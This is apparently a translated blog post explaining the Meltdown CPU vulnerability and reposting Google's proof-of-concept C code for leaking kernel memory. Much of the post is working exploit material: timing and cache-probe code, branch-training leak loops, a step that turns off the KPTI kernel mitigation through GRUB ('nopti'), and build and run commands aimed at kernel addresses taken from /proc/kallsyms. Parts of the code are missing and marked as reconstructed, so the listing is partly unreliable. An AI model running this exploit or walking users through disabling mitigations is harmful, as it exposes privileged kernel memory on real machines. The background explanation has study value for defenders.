The x86 CPU Meltdown Vulnerability: How It Works, plus Google's Attack Code

The principle behind Meltdown is actually quite simple. Accessing a virtual address requires a page table walk (four levels of page tables on today's systems), and among each page's attribute bits there is one flag that marks the page as a kernel page or a user page. That flag is the reason a program running in user mode is not allowed to access kernel addresses: during the virtual-to-physical translation, user-mode code may only go through pages marked as user pages, while kernel-mode code uses kernel pages. The window in which Meltdown happens is created by out-of-order execution: when user-mode code illegally accesses a kernel address, the data is read into the cache before the page-attribute permission check has taken effect, and it can then be fetched back out of the cache afterwards.
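For reference, the flag in question is the U/S bit of each x86-64 page-table entry. A quick sketch of the relevant attribute bits (standard architectural layout; the helper function is just my illustration, not from the PoC below):

/* Low attribute bits of an x86-64 page-table entry. */
#define PTE_PRESENT  (1UL << 0)  /* entry is valid */
#define PTE_WRITABLE (1UL << 1)  /* page may be written */
#define PTE_USER     (1UL << 2)  /* U/S bit: set = user-accessible, clear = kernel-only */

/* The check Meltdown races against: a user-mode access to a page whose
 * U/S bit is clear must fault, but the data escapes before the fault lands. */
static int user_may_access(unsigned long pte) {
    return (pte & PTE_PRESENT) && (pte & PTE_USER);
}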

Two assembly instructions are enough to explain the principle very clearly:

mov al, byte ptr [r15]   ; r15 holds a kernel address
shl rax, 6

The first instruction, mov al, [kernel address], triggers a page fault: resolving the address walks the page tables, and that is where the permission check on the page attributes has to happen.

In a world without Meltdown the second instruction, shl rax, 6, must never execute, because the page-table permission check on the first instruction fails. But because of out-of-order execution, the second instruction runs while the permission check and the page fault are still in flight, so the kernel data has already been read into the cache and consumed by dependent instructions. (The shift by 6 multiplies the leaked byte by 64, the size of a cache line; in a full exploit a third, dependent load uses that value as an offset into a user-space probe array, so which probe line ends up cached encodes the secret byte.) This window exists on Intel Core-microarchitecture CPUs, while AMD CPUs do not have it: Intel's design traded safety for performance, whereas AMD delivers both. Credit to AMD.
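To make the cache side of this concrete, here is a minimal, self-contained sketch of the recovery step (my illustration, not part of Google's PoC below). The transiently executed sequence touches exactly one line of a user-controlled probe array, and timing every line afterwards reveals the secret byte. The 64-byte stride matches the shl rax, 6 above, and CACHE_HIT_THRESHOLD is a placeholder that has to be calibrated per machine.

#include <stdint.h>

#define CACHE_HIT_THRESHOLD 80          /* cycles; placeholder, calibrate per machine */

static uint8_t probe_array[256 * 64];   /* one 64-byte cache line per possible byte value */

/* Time one load, serialized with lfence around rdtscp. */
static inline uint64_t time_load(volatile uint8_t *p) {
    uint32_t lo, hi;
    uint64_t t1, t2;
    asm volatile("lfence; rdtscp" : "=a"(lo), "=d"(hi) :: "rcx", "memory");
    t1 = ((uint64_t)hi << 32) | lo;
    (void)*p;                           /* the load being timed */
    asm volatile("rdtscp; lfence" : "=a"(lo), "=d"(hi) :: "rcx", "memory");
    t2 = ((uint64_t)hi << 32) | lo;
    return t2 - t1;
}

/* After the transient sequence
 *     mov al, byte ptr [r15]        ; faulting kernel read
 *     shl rax, 6                    ; byte value * cache line size
 *     mov rbx, [probe_array + rax]  ; dependent load leaves a cache footprint
 * has run, scan the probe array for the one hot line: */
static int recover_byte(void) {
    for (int v = 0; v < 256; v++)
        if (time_load(&probe_array[v * 64]) < CACHE_HIT_THRESHOLD)
            return v;                   /* cached line -> the leaked byte was v */
    return -1;                          /* nothing cached: the leak failed */
}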

Google's published attack code is below. Interested readers can test it themselves; current Linux kernels are all patched, so before testing, disable the Meltdown patch (KPTI) from GRUB.
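On today's kernels that means booting with KPTI disabled, for example by adding the nopti (or pti=off) kernel parameter in /etc/default/grub and regenerating the GRUB config (sudo update-grub on Debian/Ubuntu, then reboot):

GRUB_CMDLINE_LINUX_DEFAULT="quiet splash nopti"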

#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <fcntl.h>
#include <unistd.h>
#include <err.h>
#include <sys/types.h>
#include <sys/stat.h>

/* memory clobber is not actually true, but serves as a compiler barrier */
#define pipeline_flush() asm volatile("mov $0, %%eax\n\tcpuid" : /*out*/ : /*in*/ : "rax","rbx","rcx","rdx","memory")
#define clflush(addr) asm volatile("clflush (%0)"::"r"(addr):"memory")
#define read_byte(addr) asm volatile("mov (%0), %%r11"::"r"(addr):"r11","memory")
#define rdtscp() ({unsigned int result; asm volatile("rdtscp":"=a"(result)::"rdx","rcx","memory"); result;})

int timed_load(void *ptr) {
  pipeline_flush();
  unsigned int t1 = rdtscp();
  pipeline_flush();
  read_byte(ptr);
  unsigned int t2 = rdtscp();
  pipeline_flush();
  return t2 - t1;
}

/* leak_func_condition is in an otherwise unused page to prevent interference */
unsigned long leak_func_condition_[0x3000];
#define leak_func_condition (leak_func_condition_ + 0x1800)

/* Most code isn't optimized to make the compiler's output more predictable,
 * but this function should probably be optimized.
 */
__attribute__((noclone,noinline,optimize(3))) unsigned char leak_func(uint8_t *timing_leak_array, uint8_t *source_ptr, unsigned int bitmask, unsigned int bitshift) {
  pipeline_flush();
  /* run the branch if the high-latency load returns zero.
   * if the logic was the other way around, Intel's heuristic
   * where high-latency loads speculatively return zero (?)
   * would probably bite.
   */
  if (__builtin_expect(*leak_func_condition == 0, 1)) {
    return timing_leak_array[((*source_ptr)&bitmask)<<bitshift];
  }
  return 0;
}

/* [A chunk of the original file was eaten by HTML escaping in this repost:
 * the global definitions (secret_arrays[], timing_leak_array, freshen_fd),
 * hexdump_memory(), and the header of the leak loop whose body survives
 * below. See the GitHub repo at the end of the post for the intact file.
 * In the loop, the low 5 bits of i select a training round: rounds 0..30
 * call leak_func with harmless dummy pointers while the condition is 0, so
 * the branch predictor learns "taken"; round 31 passes the real kernel
 * pointer with the condition set to 1, so the kernel address is only ever
 * dereferenced transiently, under misprediction.] */

    int bit = (i >> 5) & 0xf;
    int mislead = i & 0x1f;
    uint8_t *cur_secret_array = secret_arrays[mislead];
    char discard;
    pread(freshen_fd, &discard, 1, 0);
    pipeline_flush();
    clflush(timing_leak_array);
    clflush(timing_leak_array + (1<<10));
    *leak_func_condition = (mislead == 31);
    pipeline_flush();
    clflush(leak_func_condition);
    pipeline_flush();
    /* bitmask/bitshift reconstructed: 1<<bit selects the bit under test,
     * and 10-bit shifts a set bit to offset 1<<10 in timing_leak_array,
     * matching the two clflush() calls above. */
    leak_func(timing_leak_array, cur_secret_array, 1 << bit, 10 - bit);

/* [More code lost to HTML escaping: the timed_load() check on
 * timing_leak_array + (1<<10) that scores the leaked bit, the end of the
 * loop, and the start of main() down to its usage check; the two lines
 * below are reconstructed.] */
if (argc != 3)
  errx(1, "usage: %s <hex start address> <leak length> ", argv[0]);
  unsigned long start_addr = strtoul(argv[1], NULL, 16);
  unsigned long leak_len = strtoul(argv[2], NULL, 0);

  /* we will read from this fd before every attempt to leak data
   * to make the kernel load the core_pattern (and a couple other
   * data structures) into the CPU's data cache
   */
  freshen_fd = open("/proc/sys/kernel/core_pattern", O_RDONLY);
  if (freshen_fd == -1)
    err(1, "open corepat");

  hexdump_memory(start_addr, leak_len);
}
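A practical note: timed_load() returns raw rdtscp cycle deltas, so deciding hit vs. miss needs a per-machine threshold. A minimal calibration sketch reusing the macros from the PoC (my addition, not part of Google's code):

/* Average a deliberately cached load against a deliberately flushed one
 * and put the threshold halfway between the two means. */
int calibrate_threshold(void) {
  static uint8_t probe[4096];
  long hit = 0, miss = 0;
  for (int i = 0; i < 1000; i++) {
    read_byte(probe);                 /* warm the cache line */
    hit += timed_load(probe);
    clflush(probe);                   /* evict it again */
    miss += timed_load(probe);
  }
  return (int)((hit + miss) / 2000);  /* midpoint of the two means */
}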

GitHub: https://github.com/Tinycl/google_poc
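Assuming the file is saved as google_poc.c (hypothetical name), building and testing looks roughly like this; the first argument is a kernel virtual address in hex, the second the number of bytes to dump. linux_banner is a handy target because its contents (the kernel version string) are known:

gcc -o google_poc google_poc.c
sudo grep linux_banner /proc/kallsyms   # find a known kernel address, e.g. ffffffff81a000a0
./google_poc ffffffff81a000a0 64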